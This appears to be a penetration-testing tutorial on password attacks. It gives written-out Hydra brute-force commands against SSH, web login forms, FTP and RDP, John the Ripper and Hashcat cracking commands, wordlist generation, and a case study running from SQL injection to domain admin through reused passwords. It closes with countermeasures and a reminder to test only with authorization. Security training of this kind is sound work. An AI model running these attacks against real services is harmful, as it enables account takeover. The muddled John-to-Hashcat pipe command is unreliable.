Advanced password attack techniques for various protocols and services.

Password attacks remain one of the most effective initial access vectors. Mastering Hydra for online attacks and John the Ripper for offline cracking is essential for any security researcher.

Hydra: Online Password Attacks


# SSH brute force with username list
hydra -L usernames.txt -P passwords.txt ssh://target.com

# HTTP POST form attacks
hydra -l admin -P passlist.txt target.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"

# FTP attacks with service detection
hydra -L users.txt -P passwords.txt ftp://target.com

# RDP attacks for Windows environments
hydra -t 1 -V -f -L users.txt -P passwords.txt rdp://192.168.1.100

John the Ripper: Offline Password Cracking


# Basic password hash cracking
john --format=raw-md5 hashes.txt

# Wordlist mode with rules
john --wordlist=rockyou.txt --rules hashes.txt

# Incremental mode for comprehensive attacks
john --incremental=All hashes.txt

# Show cracked passwords
john --show hashes.txt

Advanced Hashcat Integration:


# Convert hashes for Hashcat
john --format=raw-md5 hashes.txt --stdout | hashcat -m 0 -a 0 hashes.txt rockyou.txt

# GPU-accelerated cracking
hashcat -m 1000 -a 0 nt_hashes.txt rockyou.txt --force

Protocol-Specific Attack Strategies:

  • SSH: Use common default credentials and weak keys
  • HTTP Forms: Analyze login mechanisms for parameter names
  • Database Services: MySQL, PostgreSQL default credentials
  • Network Services: SNMP community strings, Telnet logins

Password Analysis and Wordlist Creation:


# Generate custom wordlists from target website
cewl https://target.com -m 6 -w custom_wordlist.txt

# Password policy analysis
crunch 8 12 -t @@@%%%^^ -o policy_wordlist.txt

# Combine and optimize wordlists
cat wordlist1.txt wordlist2.txt | sort -u > combined_wordlist.txt

Real-World Case Study:

During a penetration test, we recovered password hashes from a compromised database:

  1. Used SQL injection to extract MD5 password hashes
  2. John cracked 40% of hashes in under 2 hours using wordlist+rules
  3. Discovered password reuse across multiple services
  4. Gained domain admin access through reused credentials

Defensive Countermeasures:

  • Implement account lockout policies
  • Use multi-factor authentication
  • Enforce strong password policies
  • Monitor for brute force attempts

Key Takeaways

  • Implement proper authorization and authentication
  • Regular security assessments and penetration testing
  • Stay updated with latest security threats and patches
  • Follow ethical hacking principles and responsible disclosure
Pro Tip

Always conduct security testing in authorized environments only and follow responsible disclosure practices.